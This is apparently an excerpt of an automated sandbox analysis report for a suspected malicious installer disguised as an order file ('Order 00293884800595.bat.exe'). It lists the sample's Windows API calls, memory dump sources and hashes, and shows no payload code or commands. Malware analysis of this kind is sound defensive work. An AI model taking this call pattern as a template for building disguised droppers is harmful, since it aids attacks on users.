                                                  • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                  • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                                  • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                  • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                  • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                                  • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                  • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(6CA5504C,00000004,00000040,6CA5503C), ref: 6CA529CF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true
                                                  • Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 46c353ca108631c612ab927759d248f974a16ec98ed3a15f2af6d16d74fce79c
                                                  • Instruction ID: 6f638060b087df5bccf5c3dee63622a99b6f1c6359052159931bbbbe566a4b0d
                                                  • Opcode Fuzzy Hash: 46c353ca108631c612ab927759d248f974a16ec98ed3a15f2af6d16d74fce79c
                                                  • Instruction Fuzzy Hash: 2FF0C9B0704382DECB68CF38D44470A3FF0BB1A364BD1C92AE14ED6641E33451968B91
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                  • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                                  • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                  • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                                  • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                                  • Opcode Fuzzy Hash: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                                  • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                                  APIs
                                                  • SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040438B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                                  • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                                  • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                                  • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                                  • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                                  • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                                  • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                                  APIs
                                                  • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                  • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                  • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                  • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                  • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                  • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                  • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                                  • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                                  • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                                  • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                                  APIs
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                    • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
                                                    • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                    • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                                    • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                                    • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                                    • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                                    • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                                  • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                                  • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                                  • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                                  • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                                  • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                                  • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                                  • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                                  • lstrcmpiA.KERNEL32(Call,0042A488), ref: 00404926
                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404932
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                                    • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                                    • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                                  • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                                    • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                                    • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
